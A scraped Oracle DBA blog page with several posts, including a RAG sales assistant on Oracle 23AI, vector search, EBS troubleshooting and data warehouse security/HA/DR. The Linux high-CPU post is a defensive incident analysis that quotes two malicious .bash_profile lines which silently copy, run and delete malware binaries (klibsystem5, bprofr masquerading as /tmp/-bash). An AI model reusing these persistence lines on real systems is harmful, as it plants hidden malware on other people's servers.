Monday, December 16, 2024

Building a Retrieval-Augmented Generation (RAG) System with Oracle Database 23AI, OCI and LLM(s): Powering Up Information Retrieval with AI

Greetings, database enthusiasts! Today, we're diving into the exciting world of Retrieval-Augmented Generation (RAG) systems. Here I am, blogging again. This time the motivation is Oracle Database 23AI's vector capabilities, which we leveraged while building ourselves a Sales Assistant. Alongside the power of Oracle 23AI, we used OCI's and Cohere's large language models (and integrations), plus Flask for building our solution. This AI-based Sales Assistant is currently in beta, but with a little more effort we can make it production-ready.

Basically, our sales assistant takes questions from the user and answers them using LLM models in the backend. However, the answers generated by the LLMs are always kept in context, and this is done with the help of RAG (and some orchestration in our Python code).

The value here is that we used Oracle Database 23AI as our vector store, so we didn't need to deploy a separate database for storing vector embeddings and running vector similarity searches.

You can extrapolate from that and imagine what else you can do with these new features of Oracle Database 23AI.

Anyways.. What about RAG?

Imagine a system that can not only find relevant information but also craft insightful answers based on that knowledge. That's the essence of RAG. It takes information retrieval a step further by using generative models to create comprehensive responses to user queries.

Our Project: 

In this project, we created a custom RAG system that leverages three key players:

Oracle 23AI: Oracle's new database release acts as our knowledge repository, storing documents and their corresponding vector embeddings (think of them as condensed numerical representations capturing each document's meaning).

Cohere: We'll tap into Cohere's arsenal of LLMs, like command-r-plus, for answer generation. These models are masters at weaving words into coherent and informative responses.

Flask: This lightweight web framework serves as the user interface, allowing users to interact with our system and receive answers to their questions.

The Deep Dive: How It Works

Query Embeddings: When a user asks a question, the system transforms it into an embedding using Cohere. This embedding becomes the key to unlocking relevant information.

Knowledge Retrieval: The system dives into the Oracle 23AI database, wielding the power of vector similarity search. It compares the query embedding with stored document embeddings to identify the most relevant documents – think of it as finding the closest matches in the knowledge vault.

Refining the Results: Not all retrieved documents are created equal. We utilize Cohere's reranking model to sort these documents by their true relevance to the user's query, ensuring the most pertinent ones are at the forefront.

Answer Generation: Now comes the magic! Cohere's LLM takes center stage. It analyzes the query and the top-ranked documents, crafting a comprehensive answer that incorporates both the user's intent and the relevant retrieved information. 

Serving Up the Answer: Finally, the user receives the answer, along with the most relevant documents to provide context and transparency.
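Here is a minimal sketch of that whole flow, to make it concrete. It assumes the cohere Python SDK and python-oracledb; the table and column names (docs, doc_text, doc_vector), the model choices, and the tiny Flask route are illustrative placeholders, not our exact production code.

Python

# Minimal RAG flow: embed -> vector search in 23AI -> rerank -> generate.
# Assumptions: cohere SDK, python-oracledb; schema names are hypothetical.
import array
import cohere
import oracledb
from flask import Flask, request, jsonify

oracledb.defaults.fetch_lobs = False          # fetch CLOBs as plain strings
co = cohere.Client("YOUR_COHERE_API_KEY")     # placeholder key
conn = oracledb.connect(user="rag", password="***", dsn="db23ai_high")

def answer(question: str) -> str:
    # 1) Query embedding.
    emb = co.embed(model="embed-english-v3.0", texts=[question],
                   input_type="search_query").embeddings[0]
    qvec = array.array("f", emb)              # bind as a float32 VECTOR

    # 2) Knowledge retrieval via vector similarity search.
    with conn.cursor() as cur:
        cur.execute("""
            SELECT doc_text FROM docs
             ORDER BY VECTOR_DISTANCE(doc_vector, :qv, COSINE)
             FETCH FIRST 10 ROWS ONLY""", qv=qvec)
        docs = [row[0] for row in cur]

    # 3) Rerank the candidates; keep the truly relevant ones.
    rer = co.rerank(model="rerank-english-v3.0", query=question,
                    documents=docs, top_n=3)
    top_docs = [docs[r.index] for r in rer.results]

    # 4) Grounded answer generation with command-r-plus.
    resp = co.chat(model="command-r-plus", message=question,
                   documents=[{"text": d} for d in top_docs])
    return resp.text

# 5) Serving it up through Flask.
app = Flask(__name__)

@app.route("/ask", methods=["POST"])
def ask():
    return jsonify(answer=answer(request.json["question"]))

if __name__ == "__main__":
    app.run()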

Why Oracle 23AI?

Here's why Oracle 23AI is the perfect partner for our RAG system:

Vector Powerhouse: Its vector datatype enables efficient storage, indexing, and retrieval of document embeddings, crucial for speedy searches.

Scalability: As our system grows, Oracle 23AI can handle the increasing volume of data with ease.

A Word on Overcoming Challenges

During our project, we encountered a minor problem: the Frankfurt region on Oracle Cloud Infrastructure (OCI) didn't support the specific Cohere model we needed. (Note that for some parts of the work we reached the LLM models through OCI, via its services and integrations, and for other parts, like text generation, we reached the LLM models directly from our code.) So, we switched to the Chicago region, which provided seamless integration. Just a reminder: sometimes a quick regional shift can save the day!

The Future of RAG: A World of Possibilities

RAG systems hold immense potential to revolutionize information retrieval. By combining retrieval-based approaches with generative models, we can create systems that understand user intent, provide comprehensive answers, and constantly learn and improve.

Ready to Build Your Own RAG System?

This blog post serves as a springboard for your RAG exploration. With the power of Oracle 23AI, Cohere, and Flask, you can create a system that empowers users to unlock the true potential of information. Stay tuned for future posts where we delve deeper into the code and implementation details!

As always, feel free to leave any questions or comments below. 

Wednesday, December 4, 2024

Exploring the limitations of classical computing and the types of business problems Quantum is best suited for.

While studying Quantum Business Foundations, I revisited (and updated) the relevant part of my knowledge base: the limitations of classical computing and the types of business problems quantum is best suited for (including the answer to the question "why").

This was for identifying the implications of the paradigm shift brought about by quantum for business strategy, technology, and the operating model.

Friday, November 29, 2024

Diving practically into Quantum-Safe Cryptography

Let's protect our confidential information, our secrets, with mechanisms and algorithms that are computationally difficult to break. Think ahead and make your crypto system ready for the future. Post-Quantum Cryptography it is. Be quantum-proof, quantum-safe, quantum-resistant..

Enough with the passionate intro :) I received my second IBM Quantum certificate and I am sharing it here. More to come :)

This was for being able to understand the foundations of cryptography, how the cybersecurity risk landscape is evolving in the quantum era, and how to protect against such threats through the use of new encryption algorithms.

Tuesday, June 11, 2024

EBS 12.2 -- Wf Mailer (Mail Status SENT but No Email Delivered + Email "From" Field Cannot Be Set to Desired Email Address)


EBS Workflow Mailer: A Tale of Two Mysteries

Alright folks, buckle up for some classic EBS weirdness! This one involves the Workflow Notification Mailer in a fresh Oracle EBS 12.2.11 project. We got it all configured, tested it – IMAP, SMTP, everything seemed okay. But then, like a magic trick gone wrong, emails stopped flowing. 

The customer's mail admin checked the server logs, but saw nothing. Their words? "Your mailer taps the SMTP server on the shoulder, then just walks away. No emails, no nothin'." We chased network packets, analyzed traces – same story. The mailer wasn't even attempting to send anything. No errors,  just a complete disregard for its duties.

Telnet tests? Perfect. Workflow mail status? "SENT". We tried everything: disabling TLS/SSL, using relays. Nothing worked. Finally, in a moment of desperation, we cleared the functional administrator cache and restarted the mailer. And bam! Emails started flowing again.

We suspect a wrong configuration got stuck in there during all our testing. Maybe a change, not even directly related to the mailer, messed with some underlying setting it relies on (a sneaky delivery preference, perhaps?). Whatever it was, clearing the cache did the trick.

But wait, there's more! The emails sent by the mailer had a strange "From" address, in the format "<Workflow SMTP account/username>". We tried everything on the mailer side to change it, but nothing helped. It turns out the mail server itself was missing a crucial piece: the display name setting. Without it, the server's default configuration for the "From" field was overriding (it seems) the Workflow Mailer's settings.

So, the customer added a display name, "WF Mailer PROD EBS 12.2" (exactly what we wanted!), on the mail server. And mystery number two was solved.

Moral of the story? EBS can be a box of chocolates. You never know what you're gonna get. But hey, at least we got the mail flowing and the "From" address looking the way we wanted. Now, if you'll excuse me, I need a strong cup of coffee to recover from that rollercoaster ride :)

Tuesday, June 4, 2024

Converged Database - Oracle Database 23AI Vector Search - Combine traditional search on business data with AI vector-powered similarity search.

 

Oracle Database 23AI Vector Search: A Game Changer for Enterprise Search

Hey everyone, Erman Arslan here. Today, I'm diving into a revolutionary new feature in Oracle Database 23AI: Vector Search. This technology promises to completely transform how you search for information, especially within your enterprise data.

Understanding Semantics Through Vectors

Imagine searching for data based on meaning, not just keywords. That's the power of Vector Search. It uses machine learning embedding models, like ResNet for images and BERT for text, to convert your data into vectors. These vectors represent the semantic essence of your information. Similar entities will have vectors close together in this multidimensional space.
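To make "close together" concrete, here is a tiny self-contained sketch. The four-dimensional vectors are made up for illustration (real model embeddings have hundreds of dimensions), but the distance logic is the same one vector search relies on.

Python

# Toy illustration: cosine distance between made-up "embeddings".
import numpy as np

def cosine_distance(a: np.ndarray, b: np.ndarray) -> float:
    # 1 - cosine similarity; smaller means semantically closer.
    return 1.0 - float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

cat    = np.array([0.9, 0.1, 0.0, 0.2])
kitten = np.array([0.85, 0.15, 0.05, 0.25])   # close in meaning to "cat"
car    = np.array([0.1, 0.9, 0.8, 0.0])       # far in meaning

print(cosine_distance(cat, kitten))  # small distance -> similar meaning
print(cosine_distance(cat, car))     # large distance -> different meaning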

The Power of Combining Traditional and AI-powered Search

The beauty of Oracle Database 23AI is that it seamlessly integrates traditional search with AI-powered vector similarity search. This eliminates the need for a separate vector database, which can otherwise lead to data staleness, increased complexity, hard-to-maintain consistency, and security risks.

23AI: The Enterprise-grade Advantage

Here's where Oracle shines. Oracle Database 23AI is a converged platform that eliminates the complexities of managing separate systems. It also tackles a major challenge of Large Language Models (LLMs): hallucination. By combining LLM knowledge with relevant results from vector searches, 23AI helps ensure accurate and reliable responses.

LLM + AI Vector Search: A Powerful Knowledge Base

Imagine this: you have a vast knowledge base that combines real-time enterprise data with a broad range of information from the internet. That's the magic of LLM and AI Vector Search working together. Users submit queries, which are encoded as vectors and searched against the database. The closest matches are then fed to the LLM, empowering it to deliver comprehensive and informative responses.

"LLM + AI Vector Search" means broad Range of data from internet snapshot of data from a point in time + Private Enterprise Business Data !!! (Real Time updating the knowledge base...)

Unveiling the New SQL for Vector Power

23AI introduces a range of new SQL features to unleash the power of vector searches:

  • New SQL for Vector Generation: Easily generate vectors from your data.
  • New Vector Data Type: Store vector embeddings efficiently using the new VECTOR data type.
  • New Vector Search Syntax: Perform efficient similarity searches with the VECTOR_DISTANCE function and optional distance metrics.
  • New Approximate Search Indexes: Achieve high performance with approximate search indexes for large datasets.
  • New PL/SQL Packages and Integrations: Extend the functionality with PL/SQL packages and integrate with third-party frameworks for building robust AI pipelines.

Crafting Powerful Vector Search Queries

Here's an example query that demonstrates the power of vector search:

SQL

SELECT ... FROM JOB_Postings
WHERE city IN (SELECT PREFERRED_CITIES FROM Applications...)
ORDER BY VECTOR_DISTANCE(job_desc_vectors, :resume_vector)
FETCH APPROXIMATE FIRST 10 ROWS ONLY WITH TARGET ACCURACY 90;

This query finds the job postings whose descriptions are most similar to the provided resume vector, surfacing the closest matches for the candidate.
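For completeness, here is a hedged sketch of what this can look like end to end from Python with python-oracledb: creating a table with the new VECTOR data type and then running the approximate search with a bind variable. The column definitions, the 768-dimension size, and the placeholder embedding are my assumptions, not part of the original example.

Python

# Hypothetical setup and search for the JOB_POSTINGS example (python-oracledb).
import array
import oracledb

conn = oracledb.connect(user="demo", password="***", dsn="db23ai")
with conn.cursor() as cur:
    # New VECTOR data type: 768 dimensions stored as 32-bit floats.
    cur.execute("""
        CREATE TABLE job_postings (
            job_id           NUMBER GENERATED ALWAYS AS IDENTITY PRIMARY KEY,
            job_title        VARCHAR2(200),
            city             VARCHAR2(100),
            job_desc_vectors VECTOR(768, FLOAT32)
        )""")

    # The resume embedding would come from your embedding model.
    resume_vec = array.array("f", [0.0] * 768)   # placeholder values
    cur.execute("""
        SELECT job_id, job_title FROM job_postings
         ORDER BY VECTOR_DISTANCE(job_desc_vectors, :rv)
         FETCH APPROXIMATE FIRST 10 ROWS ONLY WITH TARGET ACCURACY 90""",
        rv=resume_vec)
    for job_id, title in cur:
        print(job_id, title)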

Choosing the Right Vector Index

23AI offers two types of vector indexes for optimal performance:

  • Graph Vector Index: In-memory index for fast and highly accurate searches on smaller datasets.
  • Neighbor Partition Vector Index: Scalable index for massive datasets that can't fit in memory. It delivers fast results with a high chance of finding relevant matches.
Here is an index creation example/syntax:

DDL

CREATE VECTOR INDEX photo_idx ON Customer(photo_vector)
ORGANIZATION [INMEMORY NEIGHBOR GRAPH | NEIGHBOR PARTITIONS]
WITH DISTANCE [COSINE | EUCLIDEAN | MANHATTAN | ...]
WITH TARGET ACCURACY 90;  -- here we can specify the desired accuracy

Note that we use the APPROXIMATE keyword to tell the optimizer to use the relevant index. But even if we specify it, Oracle's Cost-Based Optimizer can still do exact searches if it finds the index access costly. Ex: FETCH APPROXIMATE FIRST 5 ROWS ONLY.

The Importance of Enterprise-grade CBO

Optimizing vector search queries, especially when combined with normalized enterprise data, requires an enterprise-grade Cost-Based Optimizer (CBO). 23AI delivers on this front, unlike purpose-built vector databases that lack this crucial functionality.

Beyond Single Vectors: Multi-Vector Queries

23AI empowers you to perform multi-vector queries, allowing you to search based on a combination of different vectors.

Key Differentiators: Why Choose Oracle Database 23AI

  • Transactional Consistency: Neighbor Partition Vector Indexes guarantee transactional consistency, making them ideal for high-speed, consistent operations.
  • Scale-out Architecture: Distribute vector search workloads across RAC nodes for exceptional scalability.
  • Exadata Offloading: Offload vector search tasks to Exadata Storage for even greater performance.
  • Seamless Integration: Oracle Sharding, parallel execution, partitioning, security, and more all work seamlessly with AI Vector Search.

AI Vector Search: The Engine of GEN AI Pipelines

23AI goes beyond search. It serves as the foundation for powerful GEN AI Pipelines. These pipelines seamlessly integrate document loading, transformation, embedding models, vector search, and LLM reasoning – all within the robust Oracle Database 23AI platform.

This is just a glimpse into the exciting world of Oracle Database 23AI Vector Search. Stay tuned for future posts where we'll delve deeper into specific use cases and explore the key features (like True Cache and Distributed-Database related enhancements...) of the new Oracle Database Release.

Friday, May 31, 2024

Erman Arslan's Oracle Forum / APR 23 - MAY 31, 2024 - "Q & A Series"

Empower yourself with knowledge! Erman Arslan's Oracle Blog offers a vibrant forum where you can tap into a wealth of experience. Get expert guidance and connect with a supportive community. Click the banner proclaiming "Erman Arslan's Oracle Forum is available now!" Dive into the conversation and ask your burning questions.

-- or just use the direct link: http://erman-arslan-s-oracle-forum.124.s1.nabble.com

A testament to its vibrancy: over 2,000 questions have been posed, sparking nearly 10,000 insightful comments. Explore the latest discussions and see what valuable knowledge awaits!



Supporting the Oracle users around the world. Let's check what we have in the last few weeks..

Tuesday, May 14, 2024

Linux -- Decoding the High CPU Usage Mystery: A Bash Shell Odyssey / Autogenerating bash process - Malware - klibsystem5 & bprofr

 

Decoding the High CPU Usage Mystery: A Bash Shell Odyssey


This blog post details the investigation of a high CPU usage issue caused by a rogue bash process on an Oracle Linux server. The systematic investigation ultimately identified malicious scripts as the cause. It also offers valuable insights into troubleshooting bash process issues and highlights the importance of secure system configurations.

Note that this is based on a real story (an issue reported to me through my forum: Erman Arslan's Oracle Forum).

The Case:

The customer encountered a bash process consuming 98% CPU. Killing it brought only temporary relief, as it automatically restarted.

The Investigation Begins:

I requested more information to understand the process's behavior. The customer provided the top command output, which revealed the bash process with high CPU usage.

Digging Deeper:

I suggested using ps with the -elf flag to get detailed process information. This revealed the bash process was in the sleeping state (S). Analyzing the /proc/8879/cmdline file confirmed it was a bash shell, but the process seemed inactive. Note that 8879 was the PID of the process.

Next, I requested the output of w to see logged-in users and processes. This helped rule out user interaction as the cause.

Process Examination:

I instructed the customer to examine the contents of the bash process's working directory (/proc/8879/cwd) and its open file descriptors (cd /proc/8879/fd/; ls -la). This revealed the process had file descriptors related to appsdev, a development OS user, and seemed to be waiting for an event (eventpoll).

Background info:

An unknown process showing up as -bash without a real command line: this might be a child process spawned by the bash shell itself, or another system service running in the background.

4 -> anon_inode:[eventpoll]: This indicates the process is using an event poll mechanism to monitor events from various sources.
9 -> anon_inode:[eventfd]: This suggests the process might be using an eventfd for efficient inter-process communication or signaling.

It is probably an OS process.. Probably, the OS or a daemon starts it.. It may belong to a monitoring process such as systemd-monitor.

*Use ps aux or pstree to get a detailed listing of running processes. Look for processes with a parent process ID (PPID) matching the bash shell's PID.

Stracing the System Call:

I analyzed the output of strace on the process. This confirmed the bash process was stuck in the epoll_pwait system call, waiting for events from an epoll instance. The repeated calls with timeouts suggested it wasn't receiving expected events. Here's how to interpret the output and troubleshoot further:

epoll_pwait: This system call waits for events on an epoll instance. It's a mechanism for efficient I/O waiting in applications.

The arguments to epoll_pwait specify the epoll instance, timeout values, and number of events to wait for.

Analysis of strace Output:

The process repeatedly calls epoll_pwait with a timeout (values like 182, 220, etc.).

Between calls, it uses clock_gettime to get the current time. This suggests the process isn't receiving expected events and keeps waiting with timeouts.
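If epoll is new to you, the following toy script (my own illustration, not from the customer's system) parks itself in epoll much like the rogue process did; attach strace -p to it and you will see a similar pattern of epoll_wait/epoll_pwait calls timing out.

Python

# Toy illustration of a process waiting in epoll with timeouts (Linux only).
import os
import select

r, w = os.pipe()                    # a file descriptor to monitor
ep = select.epoll()
ep.register(r, select.EPOLLIN)      # wait until the pipe becomes readable

while True:
    events = ep.poll(timeout=2)     # blocks in the epoll_wait syscall
    if not events:
        print("timeout, no events; waiting again...")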

Suggested more investigation:

  • Check cron jobs and systemd services for any entries that might be starting the bash process.
  • Review system logs (/var/log/messages and dmesg) for any errors related to the process.
  • Investigate Script Purpose.. If the script is legitimate, investigate its purpose and modify it to avoid excessive I/O calls and resource usage.
  • Debug Bash Processes (Cautionary Approach): I warned about the risks of enabling debug for all bash processes. This is a complex approach and should only be attempted with a thorough understanding of the potential consequences.
  • Suggested commands for getting information on the context : 
    • pstree
    • cat /proc/<pid>/cmdline
    • cat /proc/<pid>/cwd
    • cd /proc/<pid>/fd; ls -al
    • ls -l /proc/<pid>/cwd
    • strace -p <pid>
    • lsof -p <pid>
    • crontab -l
    • systemd services with systemctl list-unit-files and systemctl status <service_name>.
    • cat .bash_profile (the customer discovered this one, with the help of the suggestions above)

The Culprit Revealed:

With the provided guidance, the customer discovered a suspicious entry in the .bash_profile that was designed to automatically copy and execute a script (/tmp/-bash). This script appeared to be scanning for open ports (80, 443, etc.). This explained the eventpoll descriptor and the process waiting for I/O.

--
I can see there is an entry made in .bash_profile automatically. Please see below:
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null

--

*The system was affected by klibsystem5 and bprofr.. These were malware..

Suggestions for the fix:

  • Manual removal of the malware (klibsystem5 & bprofr) by discovering their source files and the affected system files, and deleting (or purifying, in the case of system files) all of them one by one.
  • Migrating the affected applications/databases to a new server.. This might be the better option if we can't be sure the malware has been completely removed. But if we migrate, there is a risk that we migrate the malware too, so careful and delicate work is required..

Monday, April 29, 2024

Demystifying the Oracle EBS R12.2- Prepare Phase: Code Objects and Stub Objects

This blog post tackles common questions regarding code objects and the prepare phase in Oracle EBS R12.2. Note that this is derived from my forum, based on a real question. It's especially helpful for those who are new to EBS 12.2 and want to understand how code objects are handled during patching.

The Questions:

  1. Are all code objects copied from the run edition to the patch edition during the prepare phase?
  2. If not copied, how do they exist after the cutover?
  3. Are the objects copied during the prepare phase called stub objects?

Understanding Editioning and EBR:

We clarify that code objects are editionable. This means they are managed through Oracle's Edition Based Redefinition (EBR) feature, rather than simply being copied. EBR allows for maintaining different versions of code objects within the same database.

Code Objects in the Patch Edition:

During the prepare phase, code objects aren't physically copied. Instead, they are editioned in the patch edition. This essentially creates new versions of the code objects specific to the patch.

Cutover and Using New Code Objects:

The cutover phase activates the patch edition. As a result, the newly editioned code objects become active, and you automatically start using them.

Stub Objects Explained:

These aren't actual code objects but rather placeholders. They act as pointers referencing the original code objects in the run edition.

Why Stub Objects?

Stub objects are lightweight, minimizing the initial size of the patch edition. This efficiency is crucial for online patching, where downtime is minimized.

A Clearer Picture:

Imagine the run edition as your main codebase. The prepare phase creates a new edition (patch edition) with pointers (stub objects) to the run edition's code objects. These pointers are lightweight, keeping the patch edition initially small. Finally, during cutover, the patch edition becomes active, and you start using the editioned code objects.
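To observe this from the database side, here is a small, hedged sketch using python-oracledb; the connection details and the object name are placeholders, not from the original question. The DBA_OBJECTS_AE view lists objects across all editions, so you can see the run-edition and patch-edition versions of the same code object side by side.

Python

# Hedged illustration of EBR from the database side (python-oracledb).
import oracledb

conn = oracledb.connect(user="system", password="***", dsn="ebsdb")
with conn.cursor() as cur:
    cur.execute("""
        SELECT edition_name, object_name, object_type
          FROM dba_objects_ae
         WHERE owner = 'APPS'
           AND object_name = 'SOME_PACKAGE'   -- hypothetical object
         ORDER BY edition_name""")
    for edition, name, otype in cur:
        print(edition, name, otype)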

Friday, April 26, 2024

Oracle Database / Datawarehouse Security, High Availability & Disaster Recovery

Following is a quick article that I prepared for providing data security, high availability, and disaster recovery all at once for a mission-critical Oracle Data Warehouse environment. Below, you will find Oracle Advanced Security, Oracle RAC, GoldenGate, Data Guard, and other related Oracle features and solutions, integrated together, put into context, and proposed together for securing the data, making it highly available, and protecting both the data and the services from disasters. The features and solutions given here can be used in other contexts as well (for instance, GoldenGate can be used for data integration), but here we are in the scope of data security, high availability, and DR, so I will not get into that.

Oracle Database / Data Warehouse - Advanced Security Option for Data Security:

Securing Your Oracle Data Warehouse: Why Oracle Advanced Security is the Right Choice

Introduction

Data warehouses hold an organization's most valuable asset: its data. This data can include sensitive customer information, financial records, and intellectual property. Ensuring the security of this data is paramount. Oracle Advanced Security (OAS) is the ideal solution for robust data security within your Oracle data warehouse, and it can be tailored to your data warehouse environment, providing the peace of mind that comes with knowing your data is safe.

Robust Data Security Measures

OAS offers a comprehensive suite of functionalities to address all aspects of data security:

  • Encryption: Transparent Data Encryption (TDE) encrypts data at rest within the database, rendering it unreadable even if an attacker gains access to storage media.
  • Access Controls: OAS enforces granular access controls, allowing you to define precisely who can access specific data and what actions they can perform.
  • Authentication: OAS supports various strong authentication mechanisms like Kerberos and PKI, ensuring only authorized users can access the data warehouse.

Benefits of Oracle Advanced Security

  • Seamless Integration: OAS integrates seamlessly with your existing Oracle database environment. There's no need to modify applications, minimizing disruption and implementation costs.
  • Performance Efficiency: OAS is designed for minimal performance impact. Data encryption and decryption happen transparently, ensuring smooth operation of your data warehouse.
  • Regulatory Compliance: OAS helps meet compliance requirements for data privacy regulations like PCI DSS and HIPAA.
  • Data Security Lifecycle Coverage: OAS protects data throughout its lifecycle, from encryption at rest to securing backups and exports.

Addressing Specific Data Warehouse Security Concerns

Data warehouses often house highly sensitive data. OAS addresses these concerns:

  • Insider Threats: OAS enforces access controls, preventing unauthorized access attempts, even from privileged users.
  • Data Breaches: TDE renders data useless even if stolen, minimizing the impact of a breach.
  • Accidental Data Exposure: Data redaction, another feature of OAS, allows you to mask sensitive data retrieved by queries, further protecting sensitive information.

In addition to the Oracle Advanced Security components, Audit Vault, Database Firewall, and Database Vault can be implemented to provide the Maximum Security Architecture, ensuring the security of the data end-to-end, in transit and at rest.

Here is the short take / Conclusion:

Oracle Advanced Security provides a robust and efficient solution for securing your Oracle data warehouse. It offers comprehensive data encryption, access controls, and authentication mechanisms, all seamlessly integrated with your existing environment. By choosing OAS, you ensure a high level of data security for your most valuable asset. Implementing Oracle's Maximum Security Architecture (MSA) takes data security to the maximum level. By implementing the MSA, your gains in the context of data security will include auditability, regulatory compliance, operational efficiency, risk minimization, correct authorized access, role-based authorization, the minimum-required-privilege principle, separation of duties, data security, strengthened authentication, risk-based authorization control, compliance with security standards, centralized reporting, centralized key management, centralized security management, and anomaly detection in data access.

Data Warehouse Continuity- Oracle Database – High Availability Features:

Ensuring Uninterrupted Data Access: Oracle Database High Availability for Your Data Warehouse

Introduction

In today's data-driven world, uninterrupted access to your data warehouse is critical for informed decision-making. Downtime can lead to missed opportunities, lost productivity, and erode user confidence. This paper explores how Oracle Database's High Availability (HA) features, specifically Oracle Real Application Clusters (RAC), ensure continuous operation of your Oracle data warehouse.

Our Expertise in High Availability Solutions (just a little advertisement :)

My team and I possess extensive experience in implementing and managing high availability solutions for Oracle databases. We understand the critical role of data warehouse uptime and leverage the power of Oracle HA to create a robust and resilient environment. We can implement Oracle Database in a highly available manner by using the Oracle features in this context. These features, combined with our implementation experience, can ensure your data warehouse remains accessible 24/7, empowering informed decisions and driving business success.

What is Oracle Database High Availability?

Oracle offers a comprehensive set of features for achieving high availability in your data warehouse. RAC, the cornerstone of this approach, allows you to run your database on multiple servers (nodes) concurrently, in an active-active manner.

This provides several key benefits:

  • Failover: If a node fails, the remaining nodes automatically take over processing, minimizing downtime and ensuring data remains accessible.
  • Scalability: RAC facilitates horizontal scaling by adding additional nodes, enabling your data warehouse to handle increased data volumes and user demands.
  • Planned Maintenance: You can perform maintenance on individual nodes without impacting overall data warehouse availability.

Addressing Data Warehouse Continuity Concerns

Data warehouses often face unique challenges regarding continuity:

  • Large Data Volumes: RAC's parallel processing capabilities ensure efficient data loading and retrieval, even with massive datasets.
  • Batch Processing Windows: Planned maintenance can be scheduled outside of critical batch processing windows, minimizing disruption.
  • Disaster Recovery: RAC integrates with Oracle Data Guard for disaster recovery, providing a geographically separate replica for business continuity in case of a major outage.

Beyond RAC: Additional High Availability Features

Oracle's HA suite extends beyond RAC, offering additional functionalities:

  • Oracle Data Guard: Creates synchronized standby databases for disaster recovery and read-only workloads.
  • Automatic Storage Management (ASM): Simplifies storage management and facilitates automated failover in case of disk failures.
  • Oracle Restart: Monitors and automatically restarts critical Oracle components in case of failures.

Here is the short take / Summary:

By leveraging Oracle Database High Availability features, we can create a highly available data warehouse environment. Our expertise ensures a seamless implementation, maximizing uptime and minimizing the impact of potential outages. We are certified Oracle experts with extensive experience in implementing and customizing Oracle Database for various industries and business requirements.

Oracle Data Warehouse - Disaster Recovery Implementation

Disaster Recovery for Your Oracle Data Warehouse: Minimizing Downtime, Maximizing Peace of Mind

Introduction

Natural disasters, technical failures, or cyberattacks can cripple your business by disrupting access to your data warehouse. Here I will briefly summarize how Oracle Database's disaster recovery (DR) features equip you to recover your data warehouse swiftly in the face of such events, minimizing downtime and ensuring business continuity. I will try to give a quick explanation of how Oracle's DR features, combined with our proven expertise (my team's and mine), can minimize downtime and ensure your data warehouse remains operational even in the face of disaster.

Our Proven Track Record in Disaster Recovery

My team and I possess a proven track record of implementing and managing robust DR solutions for Oracle data warehouses. We understand the criticality of rapid recovery and leverage Oracle's DR features to create a comprehensive disaster preparedness plan.

Oracle Database Disaster Recovery: Built-in Resilience

Oracle offers a comprehensive suite of DR functionalities designed to get your data warehouse back online quickly:

  • Data Guard: This core technology creates a synchronized copy (standby database) of your production data warehouse at a geographically separate location. This ensures data availability even if the primary site becomes unavailable.
  • Active Data Guard: This advanced option allows read-only access to the standby database, offloading some workload from the primary and enabling faster failover in case of disaster.
  • GoldenGate: For complex data warehouse environments, GoldenGate facilitates heterogeneous replication, allowing replication between dissimilar database systems if needed for your DR strategy.
  • Recovery Manager (RMAN): This powerful tool simplifies backups, enabling efficient restoration of your data warehouse to a specific point in time.

Addressing Data Warehouse DR Challenges

Data warehouses present unique considerations for disaster recovery:

  • Large Datasets: Oracle Data Guard's efficient replication methods minimize bandwidth consumption and ensure timely synchronization of massive data volumes.
  • Data Consistency: Our expertise ensures configuration of Data Guard for optimal consistency based on your specific recovery time objective (RTO) and recovery point objective (RPO) requirements.
  • Testing and Failover: Regular DR testing done in this context ensures seamless failover to the standby site and rapid data warehouse recovery.

Beyond Recovery: Building a Comprehensive DR Plan

Disaster recovery goes beyond technology. Oracle consultancy services (such as those my team and I provide) encompass:

  • DR Strategy Development: We collaborate with you to define your RTO, RPO, and DR site selection based on your business needs.
  • DR Plan Documentation: We create a comprehensive DR plan outlining roles, responsibilities, and failover procedures for a smooth recovery process.
  • Ongoing Support: We offer ongoing support to ensure your DR plan remains current and your team is prepared for any eventuality.

Here is the Short Take / Conclusion

By leveraging Oracle Database's disaster recovery features and our extensive experience, we can create a robust DR plan for your data warehouse. This ensures minimal downtime, rapid recovery, and protects your business from the impact of unforeseen disasters.

Wednesday, April 24, 2024

EBS 12.2 -- oracle.apps.fnd.cp.gsm.GSMSvcComponentContainer starts from wrong filesystem / patch filesystem

Question: How much time do you spend/lose?
Answer: Well, how much time do I gain? :)

I mentioned in my previous blog post that I would share some of the interesting cases here. Erman Arslan's Oracle Blog / Forum has 350 subscribers asking questions regularly, and here I'm sharing the interesting ones.

You asked:

We have an Oracle 12.2.6 EBS system.

Run FS is fs1

As soon as the system starts, all the services run on fs1, except oracle.apps.fnd.cp.gsm.GSMSvcComponentContainer

GSM starts on fs2. Concurrent Managers are using binaries from fs2.

If we run an empty ADOP patching cycle, then after cutover all is OK -> they all start from fs2.

But if we run it one more time, all the services start from fs1 as expected, but those mentioned ones start from fs2!

Running adconfig is not helping, and we even checked that in the context file of fs1 none of the parameters reference fs2.

None of the env parameters point to fs2.

Where does it take that fs2 value from?

What is this? Any ideas?

Moreover;

if I do env |grep fs2 -> the patch_base is fs2.

So that means conc is starting from the patch base..

Any hints would be appreciated :)

ps -ef |grep fs2

/testapp/oracle/TEST/fs2/EBSapps/comn/util/jdk64/bin/java -DCLIENT_PROCESSID=24445080 -Dhttp.proxyHost= -Dhttp.proxyPort= -Dhttp.nonProxyHosts= -Djava.awt.headless=true -Xmx384m -Doracle.apps.fnd.common.Pool.leak.mode=stderr:off -verbose:gc -Ddbcfile=/testapp/oracle/TEST/fs2/inst/apps/TEST_ebstestapps/appl/fnd/12.0.0/secure/TEST.dbc -Dcpid=9758 -Dconc_queue_id=1140 -Dqueue_appl_id=0 -Dlogfile=/testout/oracle/TEST/conc/log/FNDCPGSC9758.txt -DLONG_RUNNING_JVM=true -DEBS_HOSTNAME=ebstestapps -DOVERRIDE_DBC=true -DFND_JDBC_BUFFER_MIN=1 -DFND_JDBC_BUFFER_MAX=2 oracle.apps.fnd.cp.gsm.GSMSvcComponentContainer

So where in EBS is the reference to use this /testapp/oracle/TEST/fs2/EBSapps/comn/util/jdk64/bin/java, and not the java from fs1?


/testapp/oracle/test/fs2/EBSapps/comn/util/jdk64/jre/bin]> ./java -version
java version "1.7.0"

